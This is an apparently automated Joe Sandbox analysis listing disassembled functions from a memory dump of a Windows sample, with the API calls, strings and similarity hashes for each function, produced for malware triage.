CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C89806
_memset.LIBCMT ref: 00C89813
_memset.LIBCMT ref: 00C89956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C89982
CoTaskMemFree.OLE32(?), ref: 00C8998D

Strings

NULL Pointer assignment, xrefs: 00C899DB

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: b64423779bb16b27246fb5e7fafc6149935436ba2482a811614a4b6d30dad124
Instruction ID: e283f0b4ae65ca5ca8902388a9a5f6132ab9cb10487b4979480b6e9ef31e5b87
Opcode Fuzzy Hash: b64423779bb16b27246fb5e7fafc6149935436ba2482a811614a4b6d30dad124
Instruction Fuzzy Hash: 63915971D00229EBDB10EFA5DC84EEEBBB9EF09314F10411AF419A7281DB719A45DFA0

Function 00C96D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C96E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00C96E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C96E52
_wcscat.LIBCMT ref: 00C96EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C96EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C96EF2

Strings

SysListView32, xrefs: 00C96DF6

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 8e275625f248aa9f9fdf9fb7db613e7aea1655e44db3e24cc7b5540c055fb930
Instruction ID: 8c0a68de841b752239e52dc5b8a5f3fb40a0a7d5ba1db87c17ae3fc457474c98
Opcode Fuzzy Hash: 8e275625f248aa9f9fdf9fb7db613e7aea1655e44db3e24cc7b5540c055fb930
Instruction Fuzzy Hash: F041A171A00348ABDF219F64CC89BEE77F8EF08350F10042AF594E71D1D6719E858B60

Function 00C8E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00C73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C73C7A
Part of subcall function 00C73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C73C88
Part of subcall function 00C73C55: CloseHandle.KERNEL32(00000000), ref: 00C73D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8E9A4
GetLastError.KERNEL32 ref: 00C8E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C8E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C8EA63
GetLastError.KERNEL32(00000000), ref: 00C8EA6E
CloseHandle.KERNEL32(00000000), ref: 00C8EAA3

Strings

SeDebugPrivilege, xrefs: 00C8E9C2

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: df67ad95767f63fe4f2d7dfb19c80b9eadf9da8ed5dff92fc598276a4edd079a
Instruction ID: 76eaab010390adab8b063e2d09c79454b2245d74a366a3a57ecdfef51493e97b
Opcode Fuzzy Hash: df67ad95767f63fe4f2d7dfb19c80b9eadf9da8ed5dff92fc598276a4edd079a
Instruction Fuzzy Hash: DB41CD31200200AFDB24EF24CCA6FAEBBA5BF41714F14841DF9069B2D2CB74E945EB95

Function 00C72F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C73033

Strings

stop, xrefs: 00C73004
blank, xrefs: 00C72FB5
info, xrefs: 00C72FD4
question, xrefs: 00C72FEC
warning, xrefs: 00C7301C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 68fd4215e15c6ceede2cae2977d47c9c8d8d748c70b77048b4a759991e78efb8
Instruction ID: 07f2233d92cb7ae3d358c5e3ebe4846cb5e2a6b899ea46439260cd84e7f5a591
Opcode Fuzzy Hash: 68fd4215e15c6ceede2cae2977d47c9c8d8d748c70b77048b4a759991e78efb8
Instruction Fuzzy Hash: 98113A313483C6BEEB249A95DC83EAF779CDF15360F20802EF908A6181DBB05F4476A0

Function 00C742F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C74312
LoadStringW.USER32(00000000), ref: 00C74319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C7432F
LoadStringW.USER32(00000000), ref: 00C74336
_wprintf.LIBCMT ref: 00C7435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C74357

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 7b345bb96d21a6ce83ae02f3de9671829caf27125509824aa2573da5a328b68f
Instruction ID: 61eb342e70d170672b4b4fe05f074d439cf747c05a5c8b2b945028e70993c84b
Opcode Fuzzy Hash: 7b345bb96d21a6ce83ae02f3de9671829caf27125509824aa2573da5a328b68f
Instruction Fuzzy Hash: 81014FF2900208BFE71197A0DD8DFFA776CDB08301F0005AAB749E6051EA749E864B71

Function 00C9D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

GetSystemMetrics.USER32(0000000F), ref: 00C9D47C
GetSystemMetrics.USER32(0000000F), ref: 00C9D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C9D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C9D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C9D716
ShowWindow.USER32(00000003,00000000), ref: 00C9D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00C9D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00C9D77D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 3c0dc2d8b3fc7faa238d0c8ebe5de6f8c1168da4436e6ca3d9eaed1bb96f75bb
Instruction ID: ae76cc01a773fa6a272d38739abbde7abb43cb49a430391e17751df2162d7845
Opcode Fuzzy Hash: 3c0dc2d8b3fc7faa238d0c8ebe5de6f8c1168da4436e6ca3d9eaed1bb96f75bb
Instruction Fuzzy Hash: 11B18B75600215EBDF14CF69C9C97AD7BB1BF04701F09806AFC5AAB299D734AA90CB50

Function 00C12A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C12ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00C12B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C4C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C4C1C7,00000004,00000000,00000000,00000000), ref: 00C4C286

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f8ea1bf13328b20a89c7ca2d1d3cf66bab2531a61a3253061f3a85315999c0dc
Instruction ID: 005a299851753a5cf2a580985d6b3ba21bdef15e8f1a855525b087cd837b5bd0
Opcode Fuzzy Hash: f8ea1bf13328b20a89c7ca2d1d3cf66bab2531a61a3253061f3a85315999c0dc
Instruction Fuzzy Hash: 4B41EA396097809BC7798B299CCCBEE7B95BF47310F14841EE05786571C6B1A9E1F720

Function 00C770C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C770DD

Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C77114
EnterCriticalSection.KERNEL32(?), ref: 00C77130
_memmove.LIBCMT ref: 00C7717E
_memmove.LIBCMT ref: 00C7719B
LeaveCriticalSection.KERNEL32(?), ref: 00C771AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C771BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C771DE

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 5e412b1a59d35745fcd34ef71227b3956de12b51ad3f2f3dd6e227a43208581f
Instruction ID: c8cb10215b02209d002426a765cc860266763f804a3cf0aebf770c81f6c96624
Opcode Fuzzy Hash: 5e412b1a59d35745fcd34ef71227b3956de12b51ad3f2f3dd6e227a43208581f
Instruction Fuzzy Hash: CE315332900205EBCF00DFA4DC89BAE7778EF45710F2441A9E904DB256D7309E11DB60

Function 00C961D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C961EB
GetDC.USER32(00000000), ref: 00C961F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C961FE
ReleaseDC.USER32(00000000,00000000), ref: 00C9620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C96246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C96257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C96291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C962B1

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 4444c65f614008e1d4c47511c42a105d42721a1a3ed51537e4b8342cbb28ec4a
Instruction ID: d62c92213ec2e4f95ad69bde290e27cd2177264f5b14a9fa1dda9663884c46c8
Opcode Fuzzy Hash: 4444c65f614008e1d4c47511c42a105d42721a1a3ed51537e4b8342cbb28ec4a
Instruction Fuzzy Hash: E9316D72201614BFEF118F60CC8AFEA3BA9EF49765F044066FE08DA191C6759D52CB60

Function 00C6BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C6BBC4
_memcmp.LIBCMT ref: 00C6BBE6
_memcmp.LIBCMT ref: 00C6BBFE
_memcmp.LIBCMT ref: 00C6BC11
_memcmp.LIBCMT ref: 00C6BC2B
_memcmp.LIBCMT ref: 00C6BC3E
_memcmp.LIBCMT ref: 00C6BC56
_memcmp.LIBCMT ref: 00C6BC71

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 50203e17267c3082cc1893b79dfda415ca5ea9cb36eaa1c89a5ad3c6da24aeb6
Instruction ID: 1d42c36059b607c3df27dce4205f1c19e50c5ff9a57d01e33851d05fe3bb6350
Opcode Fuzzy Hash: 50203e17267c3082cc1893b79dfda415ca5ea9cb36eaa1c89a5ad3c6da24aeb6
Instruction Fuzzy Hash: 9E21F0616012267FE2347626ADC2FFB739CAE5139CF084020FD05D6643EB65DF91D2A1

Function 00C7EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9

_wcstok.LIBCMT ref: 00C7EC94
_wcscpy.LIBCMT ref: 00C7ED23
_memset.LIBCMT ref: 00C7ED56

Strings

X, xrefs: 00C7ED93

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 72fe155624f70b66947c167136c97c2bb9cf2d37190b3eacbff7b3cde796b932
Instruction ID: f221e7351baf5345996c7a027753f7bdd997ee66728ec72efdd78e0da62365ae
Opcode Fuzzy Hash: 72fe155624f70b66947c167136c97c2bb9cf2d37190b3eacbff7b3cde796b932
Instruction Fuzzy Hash: A1C17271508300DFC724EF24C855A9AB7E4FF8A310F10896DF899972A2DB31ED45EB82

Function 00C86B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C86C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C86C21
WSAGetLastError.WSOCK32(00000000), ref: 00C86C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00C86CEA
inet_ntoa.WSOCK32(?), ref: 00C86CA7

Part of subcall function 00C6A7E9: _strlen.LIBCMT ref: 00C6A7F3
Part of subcall function 00C6A7E9: _memmove.LIBCMT ref: 00C6A815

_strlen.LIBCMT ref: 00C86D44
_memmove.LIBCMT ref: 00C86DAD

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 87d2bc950bbb6465c2a85e6df7d303543261f4665de29ac1876b313dcae90f0f
Instruction ID: 603976aace9f7ffbb77d9f6b16dbb19d170e0b60ff64435d5c247aab44a5c29f
Opcode Fuzzy Hash: 87d2bc950bbb6465c2a85e6df7d303543261f4665de29ac1876b313dcae90f0f
Instruction Fuzzy Hash: F081D171208300ABC710FB24CC96FABB7E8EF85718F10491DF9559B292DA70EE45EB56

Function 00C11424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5a5b969169d6b6907fc238d08bd80753ff48f9d2fac5192ff4cf3fe1278d92
Instruction ID: db8eebb2e178521de9552a03f9829104710d0c920a3bd47e8da2b5e061099cfc
Opcode Fuzzy Hash: dc5a5b969169d6b6907fc238d08bd80753ff48f9d2fac5192ff4cf3fe1278d92
Instruction Fuzzy Hash: 82716030900109EFDB04CF59CC49AFEBB79FF86710F188159FA15AA251C734AA51DFA4

Function 00C9B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00EF5CD8), ref: 00C9B3EB
IsWindowEnabled.USER32(00EF5CD8), ref: 00C9B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C9B4DB
SendMessageW.USER32(00EF5CD8,000000B0,?,?), ref: 00C9B512
IsDlgButtonChecked.USER32(?,?), ref: 00C9B54F
GetWindowLongW.USER32(00EF5CD8,000000EC), ref: 00C9B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C9B589

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: ed290c370ca3eeffe84c011cdda6ecd4d8fefc5625aaccf45e75308e8aa63f91
Instruction ID: 94ca613409c7a91fefeea44c95183d5ab380d3942bb4d7480c6dc14c9bb66deb
Opcode Fuzzy Hash: ed290c370ca3eeffe84c011cdda6ecd4d8fefc5625aaccf45e75308e8aa63f91
Instruction Fuzzy Hash: A0718C34600204FFDF209F65E998FBA7BB9EF09300F14415AFA65972A2C731AE51EB50

Function 00C8F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C8F448
_memset.LIBCMT ref: 00C8F511
ShellExecuteExW.SHELL32(?), ref: 00C8F556

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9

GetProcessId.KERNEL32(00000000), ref: 00C8F5CD
CloseHandle.KERNEL32(00000000), ref: 00C8F5FC

Strings

@, xrefs: 00C8F525

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 26293dc9d75988e301dd9da894bfda5574c3212b866c1f9c6f1e405a725bf3cb
Instruction ID: be345055efb5fb890140dd9b7801efc3b2a839cf868b9d2d01ae84178658aea1
Opcode Fuzzy Hash: 26293dc9d75988e301dd9da894bfda5574c3212b866c1f9c6f1e405a725bf3cb
